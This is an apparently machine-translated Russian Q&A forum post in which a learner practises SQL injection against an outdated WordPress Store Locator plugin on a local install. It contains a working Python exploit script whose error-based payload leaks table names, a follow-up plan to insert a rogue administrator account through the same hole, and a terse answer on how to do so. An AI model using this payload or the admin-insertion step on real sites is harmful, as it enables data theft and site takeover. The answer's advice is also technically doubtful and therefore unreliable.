2015-12-24 3 views
1

Как начинающий эксперт по сетевой безопасности, я практиковал выполнение SQL-инъекций в моей установке WordPress.Использование Python для SQL Injection (WordPress)

В частности, я выбрал это vulnerability, найденное в устаревшем плагине.

До сих пор я был в состоянии успешно извлекать информацию из базы данных, используя следующий код:

import requests,re 
url = 'http://localhost/wp-content/plugins/store-locator/sl-xml.php' 

params = { 
    "debug":"1", 
    "mode":"gen", 
    "sl_vars[num_initial_displayed]":"2,1 procedure analyse(extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 90,1))),1);" 
} 

r = requests.get(url, params=params) 
print re.match(r"Invalid query: XPATH syntax error: ':([^']*)'", r.text).group(1) 

Выход: wp_users

Мой следующий эксперимент, чтобы добавить учетную запись администратора через этот подвиг, но я просто похоже, не может понять, как правильно его запросить.

Это необходимые параметры:

INSERT INTO `wp_users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_status`) 
VALUES ('newadmin', MD5('pass123'), 'firstname lastname', '[email protected]', '0'); 

Является «вставка» действие возможно даже через такого рода метод атаки?

ответ

1

В params замените select concat(0x3a,table_name) from information_schema.tables limit 90 на запрос INSERT.

Смежные вопросы